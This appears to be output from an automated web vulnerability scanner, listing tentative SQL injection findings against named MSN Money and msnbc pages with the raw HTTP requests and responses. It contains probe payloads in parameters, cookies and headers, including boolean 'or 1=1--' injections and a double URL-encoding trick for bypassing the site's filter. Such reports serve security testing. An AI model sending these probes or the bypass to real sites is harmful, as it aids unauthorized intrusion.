P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35449

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"><head><meta http-e
...[SNIP]...

1.62. http://redacted/investor/market/worldmarkets.aspx [CULTURE cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/investor/market/worldmarkets.aspx

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/investor/partsub/funds/etfperformancetracker.aspx

Issue detail

Request 1

GET /investor/partsub/funds/etfperformancetracker.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1 (redirected)

Request 2

GET /investor/partsub/funds/etfperformancetracker.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 02:16:21 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

1.66. http://redacted/investor/partsub/funds/etfperformancetracker.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/investor/partsub/funds/etfperformancetracker.aspx

Issue detail

Remediation detail

Request 1

GET /investor/partsub/funds/etfperformancetracker.aspx?fam=&cat=&p=0&tab=mkt&s=ytd&o=d&1%2527=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Length: 3080
Content-Type: text/html
Last-Modified: Wed, 04 Jun 2008 17:06:59 GMT
Accept-Ranges: bytes
ETag: "40a29a6665c6c81:1a400"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Server: TK2MCWBA01
Date: Sun, 30 Jan 2011 18:06:22 GMT
Connection: close

<LINK REL=STYLESHEET HREF=/inc/winstyle.css>
<STYLE TYPE=text/css><!--

.heading3 {color:#CC9900; font-weight: bold;font-size:11pt;font-family: Arial,Helvetica;}
.CatBackground {background:#CC9900
...[SNIP]...
<BR>

If you received this message in error, we apologize for the inconvenience.<BR>
...[SNIP]...

Request 2

GET /investor/partsub/funds/etfperformancetracker.aspx?fam=&cat=&p=0&tab=mkt&s=ytd&o=d&1%2527%2527=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 18:06:23 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 64296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...

1.67. http://redacted/investor/partsub/funds/etfperformancetracker.aspx [s parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/investor/partsub/funds/etfperformancetracker.aspx

Issue detail

The s parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /investor/partsub/funds/etfperformancetracker.aspx?fam=&cat=&s='&o=&p=0&tab=mkt HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Length: 3080
Content-Type: text/html
Last-Modified: Wed, 04 Jun 2008 17:06:59 GMT
Accept-Ranges: bytes
ETag: "40a29a6665c6c81:161bf"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:13:58 GMT
Connection: close

<LINK REL=STYLESHEET HREF=/inc/winstyle.css>
<STYLE TYPE=text/css><!--

.heading3 {color:#CC9900; font-weight: bold;font-size:11pt;font-family: Arial,Helvetica;}
.CatBackground {background:#CC9900
...[SNIP]...
<BR>

If you received this message in error, we apologize for the inconvenience.<BR>
...[SNIP]...

Request 2

GET /investor/partsub/funds/etfperformancetracker.aspx?fam=&cat=&s=''&o=&p=0&tab=mkt HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:13:58 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 65214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...

1.68. http://redacted/investor/partsub/funds/etfperformancetracker.aspx [s_cc cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/investor/partsub/funds/etfperformancetracker.aspx

Issue detail

Request 1

GET /investor/partsub/funds/etfperformancetracker.aspx?fam=&cat=&p=0&tab=mkt&s=ytd&o=d HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true'; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Length: 3080
Content-Type: text/html
Last-Modified: Wed, 04 Jun 2008 17:06:59 GMT
Accept-Ranges: bytes
ETag: "40a29a6665c6c81:1a400"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Server: TK2MCWBA01
Date: Sun, 30 Jan 2011 18:05:29 GMT
Connection: close

<LINK REL=STYLESHEET HREF=/inc/winstyle.css>
<STYLE TYPE=text/css><!--

.heading3 {color:#CC9900; font-weight: bold;font-size:11pt;font-family: Arial,Helvetica;}
.CatBackground {background:#CC9900
...[SNIP]...
<BR>

If you received this message in error, we apologize for the inconvenience.<BR>
...[SNIP]...

Request 2

GET /investor/partsub/funds/etfperformancetracker.aspx?fam=&cat=&p=0&tab=mkt&s=ytd&o=d HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true''; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 18:05:30 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 64260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...

1.69. http://redacted/investor/portfolio-manager/portfolio.aspx [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/investor/portfolio-manager/portfolio.aspx

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /investor/portfolio-manager%2527/portfolio.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:04:58 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/portfolio-manager%2527%2527/portfolio.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 400 Bad Request
Connection: close
Date: Sun, 30 Jan 2011 18:04:59 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8

<html><body>Bad Request</body></html>

1.70. http://redacted/investor/portfolio-manager/portfolio.aspx [userCh cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/investor/portfolio-manager/portfolio.aspx

Issue detail

Remediation detail

Request 1

GET /investor/portfolio-manager/portfolio.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0%2527; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1 (redirected)

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:04:00 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/portfolio-manager/portfolio.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0%2527%2527; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2 (redirected)

HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 30 Jan 2011 18:04:02 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
cache-control: private
Pragma: no-cache
pragma: no-cache
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296410642&rver=5.5.4177.0&wp=MBI&wreply=http:%2F%2Fredacted%2Fpploggedin.aspx%3FPage%3Dhttp%253A%252F%252Fmoneycentral%252Emsn%252Ecom%252Finvestor%252Fportfolio%252Dmanager%252Fportfolio%252Easpx%26Query%3D&lc=1033&id=229
Content-Length: 443
Content-Type: text/html
Expires: Sun, 30 Jan 2011 18:04:02 GMT
Set-Cookie: lcid%5Fcb=%2D; expires=Mon, 01-Nov-2010 07:00:00 GMT; domain=.redacted; path=/
Set-Cookie: pp%5Fpage=http%3A%2F%2Fmoneycentral%2Emsn%2Ecom%2Finvestor%2Fportfolio%2Dmanager%2Fportfolio%2Easpx; path=/
Set-Cookie: pp%5Frefer=; path=/
Set-Cookie: pp%5Fquery=; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296410642&rver=5.5.4177.0&
...[SNIP]...

1.71. http://redacted/money.search [MUID cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/money.search

Issue detail

Request 1

GET /money.search HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F'; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:06:02 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /money.search HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F''; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 302 Redirect
Connection: close
Date: Sun, 30 Jan 2011 18:06:02 GMT
Server: Microsoft-IIS/6.0
Location: http://moneycentral.msn.com/common/toobusy.htm

1.72. http://redacted/money.search [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/money.search

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

Request 1

GET /money.search HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 18:06:26 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 21441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...
<script type="text/javascript">
if(typeof(top.LogErr)!="undefined")window.onerror=top.LogErr;
</script>
...[SNIP]...

Request 2

GET /money.search HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 302 Redirect
Connection: close
Date: Sun, 30 Jan 2011 18:06:26 GMT
Server: Microsoft-IIS/6.0
Location: http://moneycentral.msn.com/common/toobusy.htm

1.73. http://redacted/money.search [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/money.search

Severity:	High
Confidence:	Tentative
Host:	http://technolog.msnbc.redacted
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 38908709%20or%201%3d1--%20 and 38908709%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?138908709%20or%201%3d1--%20=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

Request 2

GET /?138908709%20or%201%3d2--%20=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

1.78. http://technolog.msnbc.redacted/_news/2010/08/16/4904611-north-korea-welcome-to-twitter [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://technolog.msnbc.redacted
Path:	/_news/2010/08/16/4904611-north-korea-welcome-to-twitter

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /_news/2010%20and%201%3d1--%20/08/16/4904611-north-korea-welcome-to-twitter HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:35:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39901

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=223093804&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=223093804&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers & Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
